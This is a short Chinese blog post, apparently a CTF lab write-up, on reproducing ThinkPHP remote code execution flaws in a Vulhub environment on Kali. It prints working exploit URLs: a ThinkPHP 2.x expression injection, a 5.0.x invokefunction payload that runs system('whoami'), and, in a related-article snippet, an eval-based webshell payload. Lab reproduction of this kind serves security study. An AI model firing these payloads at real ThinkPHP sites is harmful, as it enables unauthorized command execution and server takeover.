thinkphp

最新推荐文章于 2024-04-06 05:00:10 发布
最新推荐文章于 2024-04-06 05:00:10 发布
阅读量286 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71274136/article/details/133518767
版权
本文介绍了如何在Kali系统中的Vulhub环境中搭建ThinkPHP5.0.23版本的RCE漏洞,并演示了如何利用命令执行功能获取flag,以及如何通过修改docker-compose.yml文件改变端口。
摘要由CSDN通过智能技术生成

环境搭建

我是在kali里面搭建的

参考

vulhub-thinkphp漏洞复现_vulhub thinkphp_0xActive的博客-CSDN博客

首先,看上面的搭建环境,进入vulhub/thinkphp,我们依次进行尝试。

在比赛中,我们的目的是执行命令,拿到flag。

现在,因为我的比赛只考命令执行,所以只需要命令可以正常执行就行,其他版本的sql注入漏洞、文件包含漏洞什么的就算了。

2-rce

这个是thinkphp2点多的版本,含有远程命令执行

cd ~/vulhub/thinkphp/5.0.23-rce

vim docker-compose.yml

?s=/index/index/name/${@phpinfo()}

5-rce(5.0.22\5.0.19)

http://192.168.1.242:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
 

5.0.23-rce(建议先看这个)

这个是thinkphp5.0.23,很典型的rce漏洞

咱不知道原理,直接用就行。想看原理,就在readme里,自己看吧。

修改这个文件,可以修改端口

cd ~/vulhub/thinkphp/5.0.23-rce

vim docker-compose.yml

把8080改成了9999,其他不变

这样就成功了

一大口木
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
ThinkPHP v6.0.x反序列化漏洞复现与分析
weixin_45794666的博客
03-02 9881
thinkPHP v6.0.0-6.0.3反序列化漏洞复现与分析 环境搭建 初始环境,需要注意的是,新版v6基于PHP7.1+开发 php-7.2.9 ThinkPHP v6.0.3 使用composer进行安装 composer create-project topthink/think=6.0.3 tp6.0 ⚠️坑点,截止到2021/09/16 ,默认核心安装的为framework=v6.0.9 think-orm=2.0.44 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请
tp 6.0.9反序列化漏洞
jy13172的博客
07-21 572
在vendor/league/flysystem-cached-adapter/src/Storage/Adapter.php找到了一个save方法。安装教程:https://blog.csdn.net/qq_15941409/article/details/81233168。可以看到这里可以使用write进行写文件,其实update跟write的构造链是一样的,如果存在的话就给他覆盖了。这里我们只需要将complete赋值为我们的一句话木马,也就实现了我们的写马操作。我们已经控制了继续看看。
ThinkPHP V6.0反序列化漏洞复现
WDWAGAAFGAGDADSA的博客
12-11 3860
TP6反序列化漏洞复现
ThinkPHP6.0 反序列化漏洞
Sentiment的博客
05-31 3043
当时学tp就是为了国赛,审了审3和5的寻思已经够用了肯定不能出6的吧就没再审,没想到这次就出了6.012的反序列化还好很简单,所以还是回过头审一遍吧 配置 序言 · ThinkPHP6.0完全开发手册 · 看云 (kancloud.cn) 6.0.1 composer create-project topthink/think tp6.0.1 "require": { "php": ">=7.1.0", "topthink/framework": "6.0.1
kali执行php代码的exp,ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)...
weixin_34698515的博客
03-10 699
前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。漏洞分析关键代码:// 获取控制器名$controller = strip_tags($result[1]...
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,40道网络安全面试
最新发布
m0_60721823的博客
04-06 1133
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
Thinkphp 使用Dompdf
06-08
Thinkphp 使用Dompdf
thinkphp6框架下载
04-21
1. **MVC模式**:MVC是一种软件设计模式,将应用程序分为模型(Model)、视图(View)和控制器(Controller)三个部分,ThinkPHP6充分实现了这一模式,使得代码组织结构清晰,易于维护。 2. **Composer管理**:`...
thinkphp后台管理系统
04-06
thinkphp是一个基于thinkphp6的后台管理系统,对标laravel-admin。 think-admin特色: 1、composer库一键安装,丰富的配置项目 2、根据数据库自动生成增删改查,并生成相应的菜单和权限,减少基础机械重复工作 3、...
thinkphp完整源码.rar
04-04
《深入剖析ThinkPHP框架:基于“thinkphp完整源码.rar”》 ThinkPHP是中国最流行的PHP框架之一,以其简洁、高效、易用的特性深受开发者喜爱。本文将围绕"thinkphp完整源码.rar"展开,深入解析ThinkPHP的核心概念、...
130套thinkphp5网站模板源码,企业网站建设thinkphp模板,建站thinkphp源码模板网站搭建
01-19
本资源包含130套专为ThinkPHP5框架设计的网站模板源码,是用于企业网站建设的理想选择,可以帮助开发者快速构建美观且功能完善的网站。 首先,我们要理解ThinkPHP5框架的核心特点。它采用了MVC(Model-View-...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
thinkphp6-excel_thinkphp_
10-01
标题 "thinkphp6-excel_thinkphp_" 暗示我们正在处理一个使用ThinkPHP6框架的项目,其中包含了与处理Excel文件相关的功能。描述提到"thinkphp Excel 插件请自行安装",这意味着这个项目可能依赖于一个特定的ThinkPHP...
ThinkPHP5留言板_thinkphp5_
10-03
ThinkPHP5留言板】是一个基于ThinkPHP5框架开发的简易留言板应用。这个应用的主要功能是让用户能够方便地在网站上留下他们的信息,提供了一个基本的交互式平台。它是一个轻量级的系统,适合初学者了解和学习...
Thinkphp漏洞详解合集
Aiwin的博客
05-24 3608
Thinkphp漏洞合集详细分析(未完成)
《Kali安全渗透高级工程师》安全漏洞总结
君逍遥o
05-17 368
安全漏洞总结
ThinkPHP及Drupal漏洞合集
小小猪的博客
08-19 757
ThinkPHP漏洞 ThinkPHP2.x远程代码执行漏洞 漏洞复现 使用payload 直接访问,即可执行phpinfo(): http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D 利用该漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload: /index.php?s=a/b/c/${@print(eval($_POST[1]))} ThinkPHP3.2.3 SQL注入漏.
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1673
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值